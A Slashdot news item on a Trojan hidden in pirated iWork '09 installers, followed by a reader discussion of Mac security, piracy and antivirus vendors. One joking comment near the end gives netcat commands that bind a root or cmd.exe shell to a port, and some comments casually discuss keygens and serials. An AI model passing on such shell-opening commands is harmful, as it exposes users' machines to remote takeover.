Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Trojan Hides In Pirated Copies of Apple iWork '09

timothy posted more than 5 years ago | from the good-reason-not-to-pirate-software dept.

Security 431

CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."

cancel ×

431 comments

Now unveiling... (5, Funny)

Majik Sheff (930627) | more than 5 years ago | (#26570071)

The iPwn!

Re:Now unveiling... (1, Troll)

Lucky75 (1265142) | more than 5 years ago | (#26570723)

Does anyone else find it funny that after Apple ran all of those "Mac vs Windows" commercials about how Macs are virus free, this happens? It was obvious to anyone with half a brain that the only reason macs don't have viruses is because no one bothers to write one for them. Aaah, Karma, gotta love it :)

Re:Now unveiling... (5, Insightful)

Anonymous Coward | more than 5 years ago | (#26570789)

Go learn about the difference between a virus and a trojan.

Re:Now unveiling... (5, Funny)

guitarpy (1154687) | more than 5 years ago | (#26570797)

I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?

Not that I condone piracy but (3, Funny)

Anonymous Coward | more than 5 years ago | (#26570079)

Why not download the Trial version and unlock it with one of the million serials out there?

Re:Not that I condone piracy but (5, Funny)

FearForWings (1189605) | more than 5 years ago | (#26570577)

Then you don't get the trojan from iWorks, but from the keygen that further frustrates you by playing an annoying and loud tune while you go through the serial generating process.

Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?

Re:Not that I condone piracy but (4, Informative)

Firehed (942385) | more than 5 years ago | (#26570645)

Not that I'd ever use a keygen or anything, but that's definitely only a Windows problem. From what I *cough* hear, most apps are either pre-cracked, have a drag-and-drop crack (how Mac-like), or just need any of a hundred serials floating around with no further mess.

(Actually, I think all of my software is totally legit except for Photoshop, and I plan to buy it eventually)

Re:Not that I condone piracy but (5, Insightful)

Em Ellel (523581) | more than 5 years ago | (#26570721)

Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?

Erm, you can indeed. You can pay money to buy a legit serial number - voila - no crappy techno music.

-Em

Re:Not that I condone piracy but (0)

Anonymous Coward | more than 5 years ago | (#26570863)

But that would go against the people's right to enjoy the work of others for free. Haven't you heard the news? King Richard Stallman the Unbathed has decreed that not giving your work away for free is a mortal sin. Woe betide the programmer who wants to get paid. Unless he gets paid by a company for customization? I guess. It's nebulous and makes about as much sense as hippy crap normally does.

Re:Not that I condone piracy but (4, Informative)

djupedal (584558) | more than 5 years ago | (#26570751)

Apple removed serial number requirements from iWork '09 - just install for the CD and go.

Now, explain again how to use a sn with a crippled trail, please...

Of course (5, Insightful)

ColdWetDog (752185) | more than 5 years ago | (#26570085)

About Intego

Intego develops and sells desktop Internet security and privacy software for Macintosh.

Re:Of course (4, Interesting)

0100010001010011 (652467) | more than 5 years ago | (#26570225)

LittleSnitch [obdev.at] is one of my favorite security programs. Shows any outgoing connections and I can allow for that session, once, or forever and to just that port, any port, that host, that host and port.

Does anyone have a torrent to a file with the trojan? I'd like to open the .pkg and and look at it. It's surprisingly easy to look at the 'install' files. Right click on the pkg and open a few folders and look for pre-flight & post-flight scripts (which can be written in about any language). .pkgs are fun little things.

Re:Of course (3, Insightful)

calmofthestorm (1344385) | more than 5 years ago | (#26570311)

It's especially nice if such monitoring software is not "on the radar" of malware sites, since they could include a workaround for such software, as is frequently done for Norton and Symantic on Windows.

Re:Of course (1, Funny)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570517)

Right click on the pkg...

(stares at the Macbook touchpad)

*sob*

Re:Of course (4, Insightful)

ColdWetDog (752185) | more than 5 years ago | (#26570569)

(stares at the Macbook touchpad)

You got two fingers [macosxhints.com] ? (If not, sorry, I'm an insensitive clod.)

Re:Of course (-1, Troll)

Anonymous Coward | more than 5 years ago | (#26570573)

You fucking idiot, figure it out, it's not that hard.

Re:Of course (1)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570633)

Can't take a joke, eh? And if its any consolation, instead of control-clicking .apps and similar deals like .pkgs, I just manipulate them in terminal.app. And my Gateway laptop, which has OS X Leopard installed, does in fact have 2 mouse buttons.

Re:Of course (0)

Anonymous Coward | more than 5 years ago | (#26570767)

I laughed.

Re:Of course (0)

Anonymous Coward | more than 5 years ago | (#26570795)

Intego have cried "WOLF!" too many times for me to take them seriously. They claimed to have a fix for a concept virus that was still in the lab.
Their hardware sucks, too, as does their after-sales service.

Why pirate iWork (0)

Anonymous Coward | more than 5 years ago | (#26570087)

It's easier to just download the trial version and look for the serial number. This is yet another thing which Apple makes easier and more secure :)

Re:Why pirate iWork (0, Troll)

Anonymous Coward | more than 5 years ago | (#26570155)

and it's even easier to just download openoffice.

Re:Why pirate iWork (1)

spud603 (832173) | more than 5 years ago | (#26570451)

It's easier to just download the trial version and look for the serial number.

Though you're likely to get faster download times through bittorrent with a popular package like this.

Re:Why pirate iWork (2, Informative)

Firehed (942385) | more than 5 years ago | (#26570677)

Have you downloaded something using Apple's servers? I get a solid 1MB/s+ almost all the time, pretty much maxing out my entire connection. It's very rare for me to get anywhere near that on ANY torrent, even very popular ones - plus Apple doesn't ask me to upload the same amount for proper etiquette.

cynicism (5, Insightful)

bwthomas (796211) | more than 5 years ago | (#26570107)

Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.

Is that cynical?

Re:cynicism (5, Insightful)

zappepcs (820751) | more than 5 years ago | (#26570307)

They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.

The harder anti-virus vendors bleat on about how good their product is, the more bragging rights a virus writer will get for walking around the security... among their own crowd. It's more or less a case of putting up a wall and telling the world, there, you can't get past this wall now.

The real trouble with anti-virus vendors is that they tend to convince people that once their product is installed, the end user's pc is safe. It is NOT, and won't ever be. Some of the best virus programs in the world are still out in the wild, running as they were intended to run, collecting and passing information as they are supposed to. Since they are not destructive to normal computer activity, they go undetected. Don't say that such does not exist... I know you have not done forensics on all existent computers. Every now and then we hear about some corporate espionage or attacks from state military groups etc. All of this is just hinting at the real problems: The virus programs we don't know about.

Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.

Soon, you'll need a multicore CPU just to handle real time scanning. It's a giant whack-a-mole game. Always will be.

Re:cynicism (0)

Anonymous Coward | more than 5 years ago | (#26570367)

They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.

Psst. No OS can be fully secured.

Re:cynicism (2, Funny)

masshuu (1260516) | more than 5 years ago | (#26570715)

Psst. Hack my ubuntu. now

Re:cynicism (1)

calmofthestorm (1344385) | more than 5 years ago | (#26570317)

As long as there are crackers without girlfriends in the world, they don't need to.

But to fuel your paranoia, maybe *that*'s why they sometimes used to offer jobs to prominent crackers;)

New anti-virus company (5, Funny)

Narnie (1349029) | more than 5 years ago | (#26570525)

As long as there are crackers without girlfriends in the world, they don't need to.

I propose starting a new anti-virus company that will focus on dates for crackers rather than OS security.

Re:cynicism (3, Funny)

warrigal (780670) | more than 5 years ago | (#26570811)

Hey! Just who are you calling cracker, boy?

Re:cynicism (1)

philspear (1142299) | more than 5 years ago | (#26570385)

No, I've thought that for a long time. But I showed them, I simply downloaded a cracked version of their antivirus software! Sure, my computer promptly stopped working, but I'm sure that would have happened anyway. Correlation is not causation.

Re:cynicism (0)

Anonymous Coward | more than 5 years ago | (#26570523)

You know, this is a tricky question. I used to think like you, but now I am in the industry and I really don't think that is the case. Nobody really wants to make security software. In a perfect world, everything would just work and we could spend our time working on things that people actually want. However, it's an imperfect world and people are assholes, so security software is (unfortunately) necessary. It does pay pretty good and it is certainly interesting work, but I can honestly say I would feel better working on a proactively useful project (word processor, photo editor, etc.) instead of trying to protect systems from assholes.

Re:cynicism (1)

Klootzak (824076) | more than 5 years ago | (#26570641)

Is that cynical?

Actually, it's called Critical or Analytical thinking [wikipedia.org] ...

Cynicism is a negative perception of something that doesn't neccessairily involve evaluation of the topic in the larger context, something like:
"There is no good left in the world, people will never change, and I might as well become evil too!".
^^^^That's some pretty bad cynicism (or pessimism) though, hopefully most people don't ever get that cynical ;).

But, but.... (-1, Troll)

cbiltcliffe (186293) | more than 5 years ago | (#26570113)

But...but...butbutbut, Macs can't get viruses and Trojans, because they're so secure!!!

</sarcasm>

Re: But, but.... (4, Insightful)

JPortal (857107) | more than 5 years ago | (#26570147)

This requires user action and piracy. No one can -ever- claim that -any- computer is safe from, essentially, social engineering.

Re: But, but.... (5, Insightful)

vux984 (928602) | more than 5 years ago | (#26570283)

This requires user action and piracy.

So does 99.99% of windows malware.

No one can -ever- claim that -any- computer is safe from, essentially, social engineering.

Again right. But what's the solution? That is the real question.

Because this is the ecosystem microsoft lives in, we've seen what they're trying... digital signatures on drivers, the inability to put admin items in your startup, UAC prompts... etc, etc.

What is Apple going to do in response to inevitable arrival of social-engineering malware as it gains marketshare?
What is Linux going to if/when it acheives enough marketshare among joe-sixpacks for social engineering to be profitable?

As much as /. likes to take shots at Microsoft, what would you do better? *nix security is just as vulnerable to social engineering as windows is, given the same users.

Re: But, but.... (5, Interesting)

calmofthestorm (1344385) | more than 5 years ago | (#26570349)

Um most pirated software is clean of malware. The primary vectors are email and infected websites (often reputable ones that are compromised themselves, often due to sketchy)

The "piracy has VIRUSES!" myth is very much a content industry creation. I'm more concerned about malware in "genuine" software than pirated, and one more reason that I pirate things when I do. Of course, you -are- running an executable from a total stranger. At least "genuine" software makers have it tied to their name, so this could easily become truer.

Given that all three OSes have sudo, social engineering will ALWAYS work. Unless we take sudo away from average users (which is far easier to get away with on linux than windows and still have everything work smoothly)

If you're really paranoid, you might consider running your browser and mail client in a virtual machine

Re: But, but.... (1)

JPortal (857107) | more than 5 years ago | (#26570409)

I've never claimed on /. that Apple has better security. In private, to family, years ago - and I've since repented. I'm just saying, it's silly to criticize Apple for this.
It's also silly to criticize Microsoft if there are torrents of virus-laden MS Office floating around.

Re: But, but.... (1)

hellwig (1325869) | more than 5 years ago | (#26570535)

Apple does deserve criticism because they encourage their users to NOT install Anti-Virus software. Anyone remember the numerous, unnecessary stories a few weeks ago about how some old, out of date page on Apple's website was recommending Antivirus software, and then Apple took it down?

Now, maybe antivirus software wouldn't have caught this particular virus, but to tell people not to protect themselves is just stupid. People will ALWAYS download virii, they're just that stupid. Apple should encourage their users to protect themselves, not tell their users that the OS is so secure it doesn't need Antivirus. Apple touts its self as being easy to learn and use, why would they think that gives them a user-base smart enough to not download pirated software that could possibly contain a virus?

Re: But, but.... (1)

JPortal (857107) | more than 5 years ago | (#26570659)

No, I definitely agree. I agree with Leo Laporte's take on that, I think AAPL devs and tech support would be fine with antivirus - but not the marketing team.

Re: But, but.... (3, Insightful)

Doctor_Jest (688315) | more than 5 years ago | (#26570683)

They don't encourage users NOT to install... they simply don't hawk the virus software as a crutch to avoid good common sense. That's not to say that Windows (or more specifically Microsoft) does, it's just the nature of the OS itself that dictates what might be vs. what might not be.

You can safely say that, out of the box, Apple's OS is safer than Microsoft's (and you can make up your own reasons why), and this particular "virus" (it's a trojan, not a virus) isn't related to a vulnerability in the OS. It's related to a vulnerability in a trusting user. It's vastly different than an exploit that antivirus programs are designed to watch for. No antivirus would protect someone from this, unless it was known already as a trojan (then an update would have to show up, etc.) But you begin to see the fallacy of blaming Apple for social engineering. Educating the novices of ANY OS is something we should be doing, rather than trying to have a pissing contest between Jobs and Ballmer.

Re: But, but.... (2, Informative)

Daengbo (523424) | more than 5 years ago | (#26570423)

The biggest w32 virus right now only requires the user to click on what appears to be the normal choice for safe viewing of USB key contents, but other USB trojans don't even need that much. Most of the other forms of malware are installed via drive-by download or by worm propogation. I doubt 99.99% of malware needs user action, or worms, USB Trojans, and drive bys wouldn't be so dangerously prevalent.

I guess you could call "visiting a website" or "plugging in a USB key" user user action, but there's no action needed to be infected by a worm.

Wait. You're right. Users have to turn on their machines.

Re: But, but.... (2, Insightful)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570553)

So does 99.99% of windows malware.

Somehow I doubt that Windows worms and exploits only make up .001% of all Windows malware. The old lsass exploit (yeah, I know you remember) was pretty widespread and only required an internet connection and an unpatched Windows 2000/maybe XP machine. ...But it was only a part of the .001% of non-user interactive malware that your statistics seem to assert.

Re: But, but.... (1)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570655)

only make up .001%

Man, what am I? A buggy old pentium? Should have been .01%, my bad.

Re: But, but.... (1)

slazzy (864185) | more than 5 years ago | (#26570635)

Why download infected version of iWork when Apple gives it away free on their site?

Re: But, but.... (1)

Sleepy (4551) | more than 5 years ago | (#26570657)

>So does 99.99% of windows malware.

If you are going to make up false statistics, at least make them BELIEVABLE.

Besides accusing 99% of the population who are hit by malware of being thieves and you are likely to know what you are saying is untrue. malware-on-USB-drives and picture frames, browser hijacking...

Re: But, but.... (0)

Anonymous Coward | more than 5 years ago | (#26570671)

Slashdot is no place for insightful discussions!

What is Apple going to do in response to inevitable arrival of social-engineering malware as it gains marketshare?

Why, make the OS check the Apple Store every time the user downloads an unknown application, of course!

What is Linux going to if/when it acheives enough marketshare among joe-sixpacks for social engineering to be profitable?

Blame the users!
Put up a big honking screen saying "do not give your password to other people" at startup, and make some problems fixable without root privileges.

As much as /. likes to take shots at Microsoft, what would you do better?

Nothing. We just want to continue taking potshots, since we're so used to Microsoft-bashing since the early 1990s.

*nix security is just as vulnerable to social engineering as windows is, given the same users.

*nix security may be more vulnerable, since these users will use the root account for everything.

Re: But, but.... (1)

ceoyoyo (59147) | more than 5 years ago | (#26570437)

Macs are much more difficult to infect with a worm or virus, neither of which has to ask the user to do something.

ANY (usable) system is vulnerable to trojans, no matter how well designed.

It's all Apple fault (4, Funny)

pHatidic (163975) | more than 5 years ago | (#26570119)

If only Apple hadn't stripped out the DRM this would have never happened!

No, that's impossible. (2, Funny)

coppro (1143801) | more than 5 years ago | (#26570121)

Haven't you seen the ads? Mac OS X doesn't get viruses. This story is a complete fabrication, bankrolled by Microsoft, created to instil fear in The Perfect Operating System. Please link real stories next time.

Re:No, that's impossible. (4, Insightful)

falcon5768 (629591) | more than 5 years ago | (#26570239)

Whos talking about a virus? I dont see ANYTHING about a virus. I DO see a story about a TROJAN. Whole different ball of wax there. No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admini password to install it.

Re:No, that's impossible. (3, Interesting)

onecheapgeek (964280) | more than 5 years ago | (#26570275)

And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.

Re:No, that's impossible. (5, Insightful)

AKAImBatman (238306) | more than 5 years ago | (#26570337)

And how long has it been since a true virus was attacking windows?

Just this week. [nytimes.com]

It's always trojans, worms or adware and has been for several years.

A worm differs from a virus only in so much that it doesn't need to copy itself into a system program. For all intents and purposes however, the difference between the two terms is antiquated.

Re:No, that's impossible. (1)

MacColossus (932054) | more than 5 years ago | (#26570373)

As a virus requires user interaction such as double clicking a email attachment and worms require no user interaction and auto install due to unpatched vulnerabilities in the OS, I would think worms are worse. The last time a major worm hit over 9 million Windows users was Jan 20th 2009. http://www.techtree.com/India/News/Windows_Virus_Infects_9_Million/551-98002-582.html [techtree.com] Back on topic, Macrumors reports that the trojan is already receiving instructions and participating in Denial of Service attacks. They also have manual removal instructions. http://www.macrumors.com/2009/01/22/iwork-09-torrent-carrying-os-x-trojan/ [macrumors.com]

Re:No, that's impossible. (1)

ceoyoyo (59147) | more than 5 years ago | (#26570467)

Yes. Worms. Nobody ever hears about a trojan attacking Windows. It's simply not news.* Worms are the really evil ones, because they spread with no intervention, over the network, meaning they can infect a huge number of machines very quickly.

Re:No, that's impossible. (2, Funny)

troll8901 (1397145) | more than 5 years ago | (#26570729)

And how long has it been since a true virus was attacking windows?

Every single day. Truly. They do that in building construction and renovation all the time.

("You move to an area and you multiply and multiply ... There is another organism on this planet that follows the same pattern. Do you know what it is? A virus.")

It's always trojans, worms or adware and has been for several years.

I don't think big wooden horses can fit through a window, although little crawling worms and poster advertisements can.

Re:No, that's impossible. (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570305)

No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admini password to install it.

I disagree. Systems can be and have been designed to make getting a trojan running and useful a very, very difficult feat of social engineering or even impossible without hacking the machine in advance. Right now these systems are fairly restricted in their deployment and none are mainstream on consumer PCs, but that doesn't mean mainstream OS's can't catch up and both OS X and Linux are working on technologies that can help mitigate trojans.

Re:No, that's impossible. (1)

Sir_Lewk (967686) | more than 5 years ago | (#26570575)

Bullshit. A proper trojan differs from regular programs only in that it convinces the user it's meant for something else.

Re:No, that's impossible. (0)

Anonymous Coward | more than 5 years ago | (#26570819)

A proper trojan differs from regular programs only in that it convinces the user it's meant for something else.

True.

This is the exact reason why you will never find a trojan in an open source repository. The source code will reveal what it really is meant for. All it takes to be uncovered is one person who can read the source, if it even gets that far.

It really should be noted... (4, Funny)

Anonymous Coward | more than 5 years ago | (#26570129)

That it is the easiest trojan to use ever. Bravo, Apple.

Why is this a story? (2, Insightful)

Dreadneck (982170) | more than 5 years ago | (#26570145)

Since when does a PEBKAC error count as news? If you're idiot enough to install pirated software then you deserve what you get - and absolutely nobody can protect a computer system against user stupidity.

Re:Why is this a story? (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570263)

Since when does a PEBKAC error count as news?

I take exception to your assertion. Just because a user runs a program does not mean that program should automatically be able to connect to a remote server without their permission or notification. That's the case for almost all current, mainstream OS's but that does not mean it is a good design.

Second, this is news because it is a trojan reportedly in the wild for a platform where there are very few trojans circulating, especially trojans that are not targeting a specific person or company. People want to know about it and it if it signals the beginning of a trend then Apple may finally have the motivation to push their new security frameworks more aggressively and develop other security elements to help protect users from trojans. It's not like there isn't anything that can be done to make trojans less dangerous.

...and absolutely nobody can protect a computer system against user stupidity.

True, but having some fairly reasonable expectations of your computer and not understanding that it is different from other consumer appliances like the iPhone or a TV is not stupidity. It is ignorance, but forgivable (in my opinion) for non-technical users. A well designed OS in this day of prevalent malware should lock down individual applications and check them against a database of signatures (both known good applications and known malware) and let the user know when a new application connects to outside servers and what those servers are and give them the option of allowing the connection or preventing it.

Re:Why is this a story? (2, Insightful)

Dreadneck (982170) | more than 5 years ago | (#26570335)

From the article:

The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password

As I said, it's a PEBKAC error. If you give an installer your admnin password it can do whatever it pleases. Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password. No security paradigm will ever be invented that cannot be undermined by human stupidity.

Re:Why is this a story? (0, Flamebait)

Dreadneck (982170) | more than 5 years ago | (#26570407)

And if a user is stupid enough to install a pirated ware AND give said ware the root password, what on earth makes you think they will possibly be able to understand what to do if informed that process xyz is opening a connection?

Re:Why is this a story? (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570563)

And if a user is stupid enough to install a pirated ware AND give said ware the root password, what on earth makes you think they will possibly be able to understand what to do if informed that process xyz is opening a connection?

Some will and some won't, but if you don't give them the option than you can hardly blame them. Users need better choices and need to enter their password less often for normal application installs first, then we can worry about user education to deal with the remaining applications.

Re:Why is this a story? (2, Insightful)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570515)

As I said, it's a PEBKAC error. If you give an installer your admnin password it can do whatever it pleases.

And if you read my post, I'm telling you that is a design flaw in the OS. On a well designed OS, the software has more granularity of permission than "can do everything include connect to random servers" and "can't install". Apple seems to agree with me since they added an ACL framework to restrict applications with a finer level of permissions in the last version, although it is only used for a small subset of applications so far.

Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password.

I think installing pirated software is unethical and risky, but not necessarily stupid. As for giving it the root password, users have to give up their password all the time to install software, which is part of the problem.

No security paradigm will ever be invented that cannot be undermined by human stupidity.

Maybe, maybe not, but you can sure do a heck of a lot more than current, mainstream OS's do now to help users avoid such security threats.

Re:Why is this a story? (1)

Trogre (513942) | more than 5 years ago | (#26570379)

iPhone... consumer appliance.

I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

Re:Why is this a story? (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570597)

iPhone... consumer appliance. I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

Software for the iPhone is centrally distributed by Apple and uses a signing framework to check packages (regular OS X has it to but it is largely unused). So how is someone going to post fake software with a trojan in it? If they manage to slip one past Apple's review, as soon as it is found Apple can revoke the signature for all copies deactivating them. Software on the iPhone runs in a sandbox and generally has limited permissions making it hard to root. All of these can be overcome, but it is really really hard by comparison to OS X on a Mac, where most of these security measures are not utilized. About the only real issue is if someone hacks the iPhone so it can run other software then installs a trojan, but that applies only to a small subset of iPhones.

Re:Why is this a story? (0)

Anonymous Coward | more than 5 years ago | (#26570403)

Why would you download a pirated copy of iwork 09 just download the trial version from apple and use us a serial from one of the myriad of sites to make it fully functional.

Actually (1)

commodoresloat (172735) | more than 5 years ago | (#26570777)

I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's accurate to say that "pirated" software is inherently less secure.

I can see the commercial: (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#26570149)

Mac: Hi, I'm a Mac
PC: And I'm a PC.

Mac: I'm sleeker, stronger, and more attractive!
PC: Well, I know much more people than you do.

Mac: Look at my physique, I'm the perfect specimen of health!
PC: You gave me chlamydia last month.

Mac: What?!
PC: I'm lucky my doctor saw it and prescribed antibiotics for it. All clean! Have you been tested lately?

Mac: No, and you said you wouldn't tell anybody!
PC: It was going to happen sooner or later. We had to hook up sometime, right?

Mac: Don't let anybody find out about this! My reputation will be ruined!
PC: Dude, everybody already knew you were a faggot. I just regret letting you in my room that night.

Mac: Now everybody's gonna know! What an I supposed to tell them?!
PC: Uh, you're an arrogant gay?

Re:I can see the commercial: (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#26570537)

omg, seriously the funniest mac ad spoof i've ever SEEN, let alone read. Kudos, arrogant faggot!

If Apple were evil... (2, Insightful)

JoshuaZ (1134087) | more than 5 years ago | (#26570157)

If Apple were evil they could deliberately put hacked versions onto filesharing sites. More seriously, this is a good example of why even pirating software is really not a good idea. Unless you know exactly who you are downloading from you don't know what you are getting. Very little commercial software has nice little checksums or hashes that are easily available for you to verify. Downloading pirated software is a bit like having unprotected sex with a stranger. It might feel real good now, but you are going to regret it later.

Re:If Apple were evil... (0, Offtopic)

pipingguy (566974) | more than 5 years ago | (#26570823)

Why is the latest iTunes update 75MB? My relatively small SSD can't keep up with these bloated patches.

haha (0)

Anonymous Coward | more than 5 years ago | (#26570165)

haha

Not a vulnerability (0, Flamebait)

The Bungi (221687) | more than 5 years ago | (#26570171)

But like many a Windows trojan/malware that relied on user intervention to get its foot in the door, I don't see why this cannot be blamed on Apple's "sloppy code" (to draw a parallel with the same things that get blamed on Microsoft).

A Unix-like system with a root account is not superior to an NT box, even when used by someone who runs under a non-privileged account but cannot be bothered to exercise some damn common sense wrt what they put on their computers.

As their numbers grow, I expect masses of stupid Apple users (probably the same stupid Windows users that migrated to OS X to be "safe") to do things like enter their root password into browser add-ons because they are asked for it, and download "cool" screensavers and pirated software like this, loaded with malware. Membership in botnets cannot be far behind at that point.

And then when Apple machines get hit by exploits to vulnerabilities that have been patched for three months which users can't be bothered to install updates for, all will be good.

And guess what OS will be next up.

Re:Not a vulnerability (1)

speedingant (1121329) | more than 5 years ago | (#26570247)

OS X doesn't come with root enabled by default. Giving your password can give said application su privileges, but won't be able to edit system files owned by root. They have to be well engineered daemons themselves to do something like this. And it all starts with the person using the computer typing in their password to install something dodgy.

Re:Not a vulnerability (2)

onecheapgeek (964280) | more than 5 years ago | (#26570289)

If it can install a launch agent/daemon, it runs as system with full access to anything. And all it takes to install a launch agent/daemon is your admin password.

Re:Not a vulnerability (1)

Doctor_Jest (688315) | more than 5 years ago | (#26570711)

and since no amount of OS security can protect someone from giving their password out, we're not looking at a vulnerability... unless you count the user himself/herself. :)

Re:Not a vulnerability (4, Insightful)

DurendalMac (736637) | more than 5 years ago | (#26570261)

I don't think anyone would blame Microsoft for user-installed malware. It's when you get something simply by going to a website, clicking a link, mounting a drive, or even just hooking it up to the internet that can be blamed on lousy code. When malicious nasties get onto OS X by any of the above with no real action on the user's part, then you we can all blame Apple just like we blamed Microsoft. Until then, it's just a PEBKAC issue.

You must be new here. (1)

HornWumpus (783565) | more than 5 years ago | (#26570353)

Micro$oft is the whipping boy.

Granted they make it easy (to install malware and whip them.)

Re:Not a vulnerability (1)

The Bungi (221687) | more than 5 years ago | (#26570463)

I don't think anyone would blame Microsoft for user-installed malware.

People do, in fact. They simply lump those into the "Windows is insecure" mantra. Statistically the number of actual vulnerabilities that have not been patched and have an exploit in the wild (which would be a good example of security breakdown) are rare.

Re:Not a vulnerability (0)

Anonymous Coward | more than 5 years ago | (#26570749)

I don't think anyone would blame Microsoft for user-installed malware.

You must be new here.

But... (2, Interesting)

alienunknown (1279178) | more than 5 years ago | (#26570207)

From the article:

Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.

Most antivirus programs on os x actually scan for Windows viruses only, and are totally useless against almost all os x malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the mac users out there who get a mac virus scanner that only scans for windows viruses? A lot of people are being duped.

CrimeWire and RootKitaZa! (1)

thecoolbean (454867) | more than 5 years ago | (#26570231)

w4r3z n00bz abound in every user base, Mac is no exception. Hooray for learning experiences!

Re:CrimeWire and RootKitaZa! (-1, Troll)

Anonymous Coward | more than 5 years ago | (#26570357)

I am just surprised that there is actually enough Mac software for there to even be a pirate community for it.

Obviously, it's a secret SDK (1)

thered2001 (1257950) | more than 5 years ago | (#26570287)

"TrojanDevKit.DMG" - available only to 'special developers'. From the EULA: "Only to be used on occasions when our IP is getting ripped to the point we get irritated. Break glass in case of emergency."

Makes Sense (0)

Anonymous Coward | more than 5 years ago | (#26570315)

Overall, 98% of the owned systems are Windows. Cracking into *nix with a virus is just not going to occur (though I see LOADS of attempts at ssh and lots of .cfm, .asp and .php attacks going on). Instead, it has to be something that fools will load in. Iworks is one of them.

Get a Mac, duh. (2, Funny)

ArbiterShadow (1222388) | more than 5 years ago | (#26570429)

Lol viruses? Get a Mac. Oh wait.

I am surprised we don't hear this more often (1)

quax (19371) | more than 5 years ago | (#26570485)

I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.

With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untempered original version. On the other hand if there is an exploitable vulnerability in a popular codec movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).

Re:I am surprised we don't hear this more often (0)

Anonymous Coward | more than 5 years ago | (#26570805)

Read up on all the recent QuickTime flaws...

Not like it used to be... (1)

youcantwin (1459567) | more than 5 years ago | (#26570511)

You really can't trust pirates anymore!

!news (0)

Anonymous Coward | more than 5 years ago | (#26570599)

Software from an untrusted source is not secure, news at 11!

Seriously, why would you think that any pirated software is secure? Hell, it's provided by people who don't mind stealing software. What makes you think they would not want to steal from you?

Re:!news (1)

plnix0 (807376) | more than 5 years ago | (#26570857)

It's not "provided by people who don't mind stealing software". It's provided by people with variable motivations, but some of whom provide it as an honest way to benefit others. None of them steal software, whatever their intentions may be.

Why not download directly from Apple? (4, Informative)

WiiVault (1039946) | more than 5 years ago | (#26570615)

I don't steal software, ever, but it is a well known fact (among Mac users) that iWork can be downloaded direct from Apple. All it takes is a valid serial number and you are ready to go. Why the heck would anybody bother firing up a torrent?

Bullshit (0)

Anonymous Coward | more than 5 years ago | (#26570631)

Let's have this independently verified. I'm sick unto death of Intego releasing these stupid "threat" notices, trying to scare people into buying their shitware.

RIAA (1)

britneys 9th husband (741556) | more than 5 years ago | (#26570689)

You know, if the RIAA had just used this approach from the beginning, instead of suing people at random, they could have avoided a ton of bad PR. Just another reason why Apple is smarter than other companies.

How is this news? (2, Insightful)

mysidia (191772) | more than 5 years ago | (#26570707)

Software programs downloaded from third-party pirate sites can contain trojans.

Film at 11!

It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.

I knew they'd installed Windows on Macs... (1)

plnix0 (807376) | more than 5 years ago | (#26570813)

but now they've managed to embed Windows inside a Mac program? Amazing.

Linux/Mac OS X trojan spreading through slashdot (1)

guruevi (827432) | more than 5 years ago | (#26570841)

Please execute the following as admin, type your password as requested:

sudo nc -l -p1234 -d -e bash-L

on windows:

nc -l -p1234 -d -e cmd.exe -L

Oh noes, I ownz yoo box now.

(similar things can be done with reverse ssh tunneling but you get the point)

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

